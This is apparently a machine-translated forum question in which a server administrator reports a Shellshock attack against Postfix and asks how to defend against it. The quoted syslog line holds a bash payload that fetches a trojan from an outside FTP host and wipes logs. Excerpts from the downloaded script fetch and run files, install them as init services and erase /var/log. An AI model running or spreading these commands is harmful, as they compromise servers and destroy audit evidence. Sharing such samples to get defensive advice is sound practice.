奇怪的黑客尝试后缀

昨天我收到一封邮件，发送邮件{@DOMAIN.ORG，邮件被标记为垃圾邮件。

正文包含脚本下载命令，如ftp://ftp.ugotownedz.org/upfile2.sh

来自syslog的行

Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O ... -rf /root/.bash_history; rm -rf /var/log/*" 

事实上，这个非常简单的未encryption的shell脚本试图build立一个木马。 对我来说，这看起来很肮脏，并没有成功。

• 如何阻止Postfix转发垃圾邮件而不阻止本地用户的垃圾邮件？
• 如何统计Postfix中单个账户发送的电子邮件数量？
• Postfix失败的SPF检查
• 后缀，虚拟别名和UTF8
• Postfix与smtpd_sender_login_maps匹配SASL用户名，而不是FROM邮件字段

但无论如何，有什么我可以做的保护postfix反对这些types的黑客？

从脚本

 ... echo sshdo.ico >> /tmp/upfile for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget ftp://$1/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file; perl /tmp/.udp/Xorg; perl /tmp/.udp/crun.d ; php /tmp/.udp/sshdo.ico; php sshdo.ico; rm -rf /tmp/.udp/sshdo.ico /tmp/.udp/crun.d /tmp/.udp/Xorg ; done ... for file6 in $(cat /tmp/upfile); do cp /tmp/.udp/$file6 /etc/init.d/$file6;cp /tmp/.udp/$file6 /etc/init.d/$file6; chmod +x /etc/init.d/$file6; sudo update-rc.d $file6 defaults ; done ... chattr +i /tmp/.udp/* rm -rf /var/log/*